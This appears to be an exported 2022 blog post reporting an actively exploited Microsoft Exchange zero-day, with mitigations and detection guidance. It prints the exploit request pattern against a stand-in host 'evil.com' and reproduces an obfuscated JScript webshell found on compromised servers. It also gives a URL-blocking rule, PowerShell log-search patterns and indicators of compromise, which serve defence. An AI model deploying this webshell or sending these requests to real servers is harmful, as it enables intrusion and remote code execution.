{"id":26729,"date":"2022-09-30T01:59:57","date_gmt":"2022-09-29T23:59:57","guid":{"rendered":"http:\/\/159.69.82.204\/win\/?p=26729"},"modified":"2022-11-16T19:55:08","modified_gmt":"2022-11-16T18:55:08","slug":"exchange-server-werden-ber-0-day-exploit-angegriffen-29-sept-2022","status":"publish","type":"post","link":"https:\/\/borncity.com\/win\/2022\/09\/30\/exchange-server-werden-ber-0-day-exploit-angegriffen-29-sept-2022\/","title":{"rendered":"Exchange Server servers attacked via 0-day exploit (Sept. 29, 2022)"},"content":{"rendered":"<p>There are reports that a new zero-day exists in Microsoft Exchange that is being actively exploited in the wild. Security researchers confirm that some installations &#8211; including a honeypot &#8211; are already infected. Details about the zero-day are not yet available. Here's an overview of what I know so far and what, if anything, can be done to detect attacks.<\/p>\n<p>I came across the facts a few minutes ago via <a href=\"https:\/\/twitter.com\/GossiTheDog\/status\/1575580072961982464\" target=\"_blank\" rel=\"noopener\">Twitter<\/a>. Security researcher Kevin Beaumont warns of a potential threat to Exchange servers from a zero-day exploit. At the same time, an email from blog reader Marco D. 
arrived (thanks for that), informing me about the issue as follows:<\/p>\n<blockquote><p>I just discovered this on <a href=\"https:\/\/mobile.twitter.com\/blackorbird\/status\/1575521156966535168\" target=\"_blank\" rel=\"noopener\">Twitter<\/a>, a zero day exploit for Exchange:<\/p><\/blockquote>\n<p><a href=\"https:\/\/mobile.twitter.com\/blackorbird\/status\/1575521156966535168\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" title=\"Exchange 0day exploit in wild\" src=\"https:\/\/i.imgur.com\/NMXrZy7.png\" alt=\"Exchange 0day exploit in wild\" \/><\/a><\/p>\n<blockquote><p>I don't know the linked Vietnamese site, but the content seemed conclusive, especially since the ZDI entries exist as well.<\/p><\/blockquote>\n<h2>First report from GTSC<\/h2>\n<p>The article WARNING: NEW ATTACK CAMPAIGN UTILIZED A NEW 0-DAY RCE VULNERABILITY ON MICROSOFT EXCHANGE SERVER by an author from Vietnam seems to be the first source describing the problem. In early August 2022, during security monitoring and incident response activities, the security team at Vietnamese cybersecurity firm GTSC discovered that a critical infrastructure had been attacked. Microsoft Exchange servers of the organizations in question were affected.<\/p>\n<p>During the investigation, GTSC's Blue Team experts determined that the attack exploited an undisclosed Exchange vulnerability, i.e., a 0-day vulnerability. The team immediately created a countermeasure plan to stop the attacks. At the same time, the GTSC Red teams began examining and debugging Exchange's decompiled code to find the vulnerability and exploit code.<\/p>\n<p>A previously unknown vulnerability (zero-day) was found that proved to be critical enough to allow attackers to perform remote code execution (RCE) on the compromised target system. GTSC immediately reported the vulnerability to the Zero Day Initiative (ZDI) to work with Microsoft. The goal was to create a patch as quickly as possible. 
The Zero Day Initiative (ZDI) verified and confirmed 2 flaws with CVSS scores 8.8 and 6.3 related to the exploit.<\/p>\n<ul>\n<li>ZDI-CAN-18333 CVSS 8.8<\/li>\n<li>ZDI-CAN-18802 CVSS 6.3<\/li>\n<\/ul>\n<p>GTSC security researchers found that other customers were also affected by a similar problem. After testing, it could be confirmed that these systems were attacked via this 0-day vulnerability.<\/p>\n<h2>Security researchers confirm the attacks<\/h2>\n<p>I was struck by the <a href=\"https:\/\/twitter.com\/GossiTheDog\/status\/1575580072961982464\" target=\"_blank\" rel=\"noopener\">tweets<\/a> of security researcher Kevin Beaumont, who confirmed on Twitter that some installations &#8211; including a honeypot &#8211; were already infected.<\/p>\n<p><a href=\"https:\/\/twitter.com\/GossiTheDog\/status\/1575580072961982464\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" title=\"Exchange 0-day (Sept 2022)\" src=\"https:\/\/i.imgur.com\/cjgycAG.png\" alt=\"Exchange 0-day (Sept 2022)\" \/><\/a><\/p>\n<p>So far, there is no patch from Microsoft to close the vulnerability &#8211; and it doesn't look like Microsoft has informed customers about the problem either.<\/p>\n<h2>Details of the attack<\/h2>\n<p>While providing Security Operations Center (SOC) services to a customer, the GTSC Blue Team discovered exploit requests in IIS logs with the same format as the long-known ProxyShell vulnerability. Kevin Beaumont writes here that the attackers pretend to be an Exchange EWS to set up a backdoor. The attack uses the following request:<\/p>\n<pre><code>autodiscover\/autodiscover.json?@evil.com\/&lt;Exchange-backend-endpoint&gt;&amp;Email=autodiscover\/autodiscover.json%3f@evil.com<\/code><\/pre>\n<p>The request above is used to access a component in the backend, where remote code execution (RCE) could then be carried out. 
According to GTSC, the attackers make use of various techniques to insert backdoors into the affected Exchange system and then move laterally on the network to other servers in the system.<\/p>\n<p>During the investigation, the security researchers discovered webshells, most of which were created hidden on the infected Exchange servers. Based on the user agent, the GTSC team was able to determine that the attacker was using Antsword. This is an active, cross-platform, open-source website management tool used by Chinese hackers to help manage webshells. Here is the corresponding JScript code:<\/p>\n<pre>&lt;%@Page Language=\"Jscript\"%&gt;\r\n&lt;%eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('NTcyM'\r\n+'jk3O3'+'ZhciB'+'zYWZl'+''+'P'+'S'+char(837-763)+\r\nSystem.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('MQ=='))\r\n+char(51450\/525)+''+''+char(0640-0462)+char(0x8c28\/0x1cc)+char(0212100\/01250)\r\n+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('Wg=='))\r\n+'m'+''+'UiO2V'+'2YWwo'+'UmVxd'+'WVzdC'+'5JdGV'+'tWydF'+'WjBXS'+'WFtRG'+'Z6bU8'+'xajhk'\r\n+'J10sI'+'HNhZm'+'UpOzE'+'3MTY4'+'OTE7'+'')));%&gt;<\/pre>\n<p>The security team suspects that these backdoors originated from a Chinese attack group because the webshell uses code page 936, a Microsoft character encoding for simplified Chinese. Another notable feature, security researchers said, is that the hacker also modified the contents of the <em>RedirSuiteServiceProxy.aspx<\/em> file to contain the webshell. 
<em>RedirSuiteServiceProxy.aspx<\/em> is a legitimate file name on an Exchange server.<\/p>\n<table border=\"0\" width=\"640\" cellspacing=\"0\" cellpadding=\"2\">\n<tbody>\n<tr>\n<td valign=\"top\" width=\"192\"><strong>FileName<\/strong><\/td>\n<td valign=\"top\" width=\"448\"><strong>Path<\/strong><\/td>\n<\/tr>\n<tr>\n<td valign=\"top\" width=\"192\">RedirSuiteServiceProxy.aspx<\/td>\n<td valign=\"top\" width=\"448\">C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\" width=\"192\">Xml.ashx<\/td>\n<td valign=\"top\" width=\"448\">C:\\inetpub\\wwwroot\\aspnet_client<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\" width=\"192\">pxh4HG1v.ashx<\/td>\n<td valign=\"top\" width=\"448\">C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Although the exploit used attack techniques that were also used for the previously known ProxyShell vulnerability, the scan of the infected Exchange servers revealed that the latest Exchange update was already installed there. Thus, exploitation of the ProxyShell vulnerability was impossible. Blue Team analysts at GTSC confirm that this is a new 0-day RCE vulnerability. Details on how the attack was conducted and further findings of the analysis are disclosed here.<\/p>\n<h2>Workarounds to mitigate the vulnerability<\/h2>\n<p>In their article, the GTSC security researchers suggest measures to prevent exploitation of the 0-day vulnerability in fully patched Exchange servers. To block attack attempts, add a new URL rewrite rule in IIS Server:<\/p>\n<ul>\n<li>In <em>Autodiscover<\/em> at FrontEnd select tab <em>URL Rewrite<\/em>, select <em>Request Blocking<\/em><\/li>\n<li>Add string \"<em>.*autodiscover\\.json.*\\@.*Powershell.*<\/em>\" to the URL Path<\/li>\n<li>Set condition input to: Choose {REQUEST_URI}<\/li>\n<\/ul>\n<p>There are corresponding screenshots in the article. 
Security researchers recommend that all organizations\/companies using Microsoft Exchange Server apply the above temporary workarounds as soon as possible to prevent potential attacks.<\/p>\n<h2>Check for compromise<\/h2>\n<p>To check if an Exchange Server has already been affected by an attack, GTSC has published a guide and tool for scanning IIS log files (stored by default in the %SystemDrive%\\inetpub\\logs\\LogFiles folder):<\/p>\n<p><strong>Method 1:<\/strong> Use the PowerShell command:<\/p>\n<pre><code>Get-ChildItem -Recurse -Path &lt;Path_IIS_Logs&gt; -Filter \"*.log\" | Select-String -Pattern 'powershell.*autodiscover\\.json.*\\@.*200'<\/code><\/pre>\n<p><strong>Addendum:<\/strong> On Facebook, a German administrator pointed out to me that he had to make some adjustments to the PowerShell command. Here are his comments:<\/p>\n<blockquote><p>Regarding the PS command to search the logfiles: I created my own logfile as a test with the appropriate pattern:<\/p>\n<p>'powershell.*autodiscover\\.json.*\\@.*200'<\/p>\n<p>on our 2016ner (German language) it doesn't find the pattern and therefore doesn't return any results and it looks like everything is fine.<\/p>\n<p>If you shorten the pattern to only 'powershell.*autodiscover' it also finds the results. Tested with PS x86 &amp; x64.<\/p><\/blockquote>\n<p>and then added:<\/p>\n<blockquote><p>I just played around a bit. 
At the end of the PS-command there must be a \"-SimpleMatch\" otherwise it recognizes the first \"\\\" in the pattern as a regular expression, so it doesn't recognize the pattern correctly and returns no results.<\/p>\n<p>Otherwise you can replace the two \"\\\" with two \"\\\" and the backslash will be recognized as an actual backslash.<\/p><\/blockquote>\n<p>The following PowerShell command, which uses \\\\,<\/p>\n<pre><code>Get-ChildItem -Recurse -Path &lt;Path_IIS_Logs&gt; -Filter \"*.log\" | Select-String -Pattern 'powershell.*autodiscover\\\\.json.*\\\\@.*200'<\/code><\/pre>\n<p>works for the administrator in question (see also the following screenshot). In a regular expression, the doubled backslash matches a literal backslash character in the log line.<\/p>\n<p><a href=\"https:\/\/i.imgur.com\/4nOTZk4.jpg\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" class=\"\" src=\"https:\/\/i.imgur.com\/4nOTZk4.jpg\" alt=\"Check with PowerShell \" width=\"646\" height=\"109\" \/><\/a><\/p>\n<p><strong>Method 2: <\/strong>Use the tool developed by GTSC.<\/p>\n<p>Based on the exploit signature, the GTSC folks have created a tool that needs much less search time than PowerShell. The tool can be downloaded from <a href=\"https:\/\/github.com\/ncsgroupvn\/NCSE0Scanner\" target=\"_blank\" rel=\"noopener\">GitHub<\/a>. 
In the article, the GTSC security researchers have also provided some Indicators of Compromise (IOCs) that can be used to identify an infection:<\/p>\n<p><strong>Webshell:<\/strong><\/p>\n<p><strong>File Name: <\/strong>pxh4HG1v.ashx<\/p>\n<p><strong>Path: <\/strong>C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\pxh4HG1v.ashx<\/p>\n<p><strong>File Name:<\/strong> RedirSuiteServiceProxy.aspx<\/p>\n<p><strong>Path: <\/strong>C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\RedirSuiteServiceProxy.aspx<\/p>\n<p><strong>File Name: <\/strong>Xml.ashx<\/p>\n<p><strong>Path: <\/strong>Xml.ashx<\/p>\n<p><strong>File Name: <\/strong>errorEE.aspx<\/p>\n<p><strong>Path: <\/strong>C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\errorEE.aspx<\/p>\n<p><strong>DLL:<\/strong><\/p>\n<p><strong>File Name:<\/strong> Dll.dll<\/p>\n<p><strong>File Name:<\/strong> 180000000.dll (dump from the Svchost.exe process)<\/p>\n<p><strong>Addendum:<\/strong> Microsoft has released some information and recommendations for mitigation &#8211; see my follow-up post\u00a0<a 
href=\"https:\/\/borncity.com\/win\/2022\/09\/30\/microsofts-empfehlungen-fr-die-exchange-server-0-day-schwachstelle-zdi-can-18333\/\" rel=\"bookmark\">Microsoft's recommendations for Exchange Server 0-day vulnerability ZDI-CAN-18333<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>[German]There are reports that a new zero-day exists in Microsoft Exchange that is being actively exploited in the wild. Security researchers confirm that some installations &#8211; including a honeypot &#8211; are already infected. 
Details about the zero-day are not yet &hellip; <a href=\"https:\/\/borncity.com\/win\/2022\/09\/30\/exchange-server-werden-ber-0-day-exploit-angegriffen-29-sept-2022\/\">Continue reading <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[580,1547],"tags":[869,69],"class_list":["post-26729","post","type-post","status-publish","format-standard","hentry","category-security","category-software","tag-exchange","tag-security"],"_links":{"self":[{"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/posts\/26729","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/comments?post=26729"}],"version-history":[{"count":0,"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/posts\/26729\/revisions"}],"wp:attachment":[{"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/media?parent=26729"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/categories?post=26729"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/borncity.com\/win\/wp-json\/wp\/v2\/tags?post=26729"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}